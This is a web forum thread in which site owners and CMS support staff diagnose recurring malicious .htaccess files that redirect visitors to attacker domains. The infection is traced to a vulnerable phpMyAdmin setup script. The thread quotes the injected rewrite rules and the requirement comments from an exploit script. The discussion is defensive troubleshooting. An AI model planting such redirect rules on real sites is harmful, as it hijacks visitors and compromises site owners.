Thread

Hello,

A client site running 1.6.9 started getting pages redirected to google.com about three weeks ago.

I found a slew of new .htaccess files littered through the site. They were causing the redirects to Google. The behavior and timing of this exploit matched exactly what is discussed in this Google webmaster forum:

http://www.google.com/support/forum/p/Webmasters/thread?tid=64fe7d9a9e90fe96&hl=en

The consensus on this forum is that this is php code injection targeting insecure installations of phpMyAdmin: http://forum.hackforce.ru/showthread.php?t=444

So I removed all the malicious .htaccess files. Two weeks later they reappeared, and I deleted them again. Yesterday, it happened again, this time the .htaccess files were a little different, instead redirecting to yagizmo.com, a known attack site. Here is what yesterday’s .htaccess files looked like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . <a href="http://yagizmo.com/%{REMOTE_ADDR}">http://yagizmo.com/%{REMOTE_ADDR}</a>

Meanwhile, I’ve been talking with my client’s host (aiso.net). My problem is they insist that their installation of phpMyAdmin is not the problem, but the cms is. Below is their latest response. (I find it interesting that they blame the “cms”, not sure if they know what cms they’re blaming):

We have already looked at phpmyadmin and that is not the issue. phpmyadmin does NOT let you upload htaccess files It only manages the database. This is 100% an exploit in the cms and if all htaccess files are not removed then the latest version of the software installed it will be just a matter of time before it gets infected again. That is because it comes in through port 80 which can not be blocked.

Would you like us to clean your site and update it?

I find their response questionable, since my understanding is that the htaccess files are generated by the malware, which got in possibly through phpMyAdmin. It seems silly to suggest that someone or something is literally “uploading” htaccess files through phpMyAdmin. Also I don’t think htaccess files can regenerate themselves since they’re not executable. Some software on the server would be generating these, right?

I’ve removed the malicious .htaccess files three times in the last month. It’s starting to feel like Whack-a-Mole.

Back to EE, I saw that version 1.7.0 includes this in the changelog:

* Fixed a security issue that in certain circumstances could result in arbitrary code execution.

I’d really appreciate some advice on whether the host is right and this could be an exploit targeting 1.6.9, or is phpMyAdmin the culprit and the host is just being lazy?

The client is willing to update to 1.7.0 is that’s the solution, but would rather not (we’re in the middle of a rebuild) if this won’t stop these recurring exploits.

Any help or suggestions would be most appreciated.

Thanks!

hwalker:

  Thanks for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. To that, we need some additional information from you…

  1. EE version and build (found at the bottom of your control panel)
  2. Other scripts on your account, whether in use or not (phpBB, etc…)*

  * If this is a shared hosting environment, the host can make a determination if the attack came through scripts on another account on the server, which is commonly the case with these types of hacks.

  While we work through this, please check through these files:

  * path.php
  * config.php
  * index.php

  to ensure that there is no unusual code such as iFrames or Javascript includes; if you do find that code, then please back-up the file and remove said code.  If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

  You may also wish to refresh your files by following the build update instructions.

  Also please ensure that you report this to your host immediately as they can help identify where the attack originated from so that steps can be taken to prevent this in the future.

The only thing that writes to the .htaccess file is the Blacklist/Whitelist. Are you using that?

Hello,
I am experiencing this same problem. I had deleted the bad .htaccess files several times since 20 December, mostly from image directories; after doing that yet again this morning I found two in subdirectories of /system/cache/page_cache that wouldn’t allow me to delete them. So I used the control panel to purge the caches, and all the others reappeared. Nothing strange in my index, config, or path files. Thanks for looking in to this!

Hi earthisland,

Thanks for reporting this. As Sue has posted above, please do notify your host as soon as possible and let us know:

Which version and build of EE are you using?
Which other scripts exist in your account, whether in use or not (phpBB, etc…)
Is the Blacklist/Whitelist module installed and active?

You may also wish to refresh your files by following the build update instructions.

Cheers

Greg

Hi all,

I had been in communication with the host about this, and after several denials they’ve tacitly admitted the exploit is through phpMyAdmin. Here’s their latest reply:

I took a look at the articles you sent us. One of the versions that was listed matches the version we are running on the older server so I will forward this onto a senior tech who will look into this further and see if they can find any information on if this is how they got into your site and to upgrade the php version to be safe.

The new server you are on is a higher version than the exploit can work on, so your site should be safe on the new server.

Have a great day.

They don’t directly say it or confirm, but it seems, as I suspected, that EE is not the problem here. A bit annoying how they reflexively blame the cms without doing their research first!

Anyone experiencing this problem should find out from their host if phpMyAdmin on their server is one of the older vulnerable versions. Here are some details:

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: <a href="http://snipurl.com/jhjxx">http://snipurl.com/jhjxx</a>
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)

# more info on:
# <a href="http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php">http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php</a>
# <a href="http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/">http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/</a>

Sue and Greg, I’ve not bothered to give you the build and other requested details, since I’m pretty confident this is not an EE issue.

Thanks!!

Thanks hwalker,

Please keep us posted on any further developments.

earthisland,

To clarify, you are saying that .htaccess files are immediately appearing in your writeable image directories after clearing caches from the EE control panel? Can you post the contents of the “bad” .htaccess files that are created?

Hi,
I’m on 1.69, Build:  20100430
The .htaccess files appeared spontaneously the first several times, usually about 5 days apart. After removing them last week, I used the EE control panel to flush the cache, and the files reappeared.

The contents of the file were staying the same as far as I could tell, so I stopped looking at them—I’m now curious as to whether the most recent version (Friday last) was different.

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . <a href="http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}">http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}</a>

I think that in the case of .htaccess files that already existed it just added these lines. The address isn’t valid. In my case, the files were added only to directories that were serving images out of posts. This had the effect of showing the text, but delivering a 404 for the image.

I have been working with my host, who likewise want me to move to a new server. Because of charset issues, this is a pain, but it will work at least if they’ve updated their phpMyAdmin version.

Thanks for posting the additional information.

Let us know what happens after you move the site to another server. (Personally, I’d take the opportunity to move to EngineHosting. 😊 )

So everyone isn’t left hanging, I did move the ‘site to another server (on the same host), and all seems well. Thanks for your help.

Myself personally if my host told me porkies like that I’d not move to another server with them, I’d completely leave them outright.

If your host doesn’t know what’s going on with their own machines then your data is not safe. That’s the way I look at it anyway.

Glad it’s all sorted now and glad they came clean (in an around about sort of way) but I would still seriously consider moving host myself.

Best wishes,

Mark

earthisland, glad your issues appear to be resolved. Feel free to start a new thread if you have any more questions.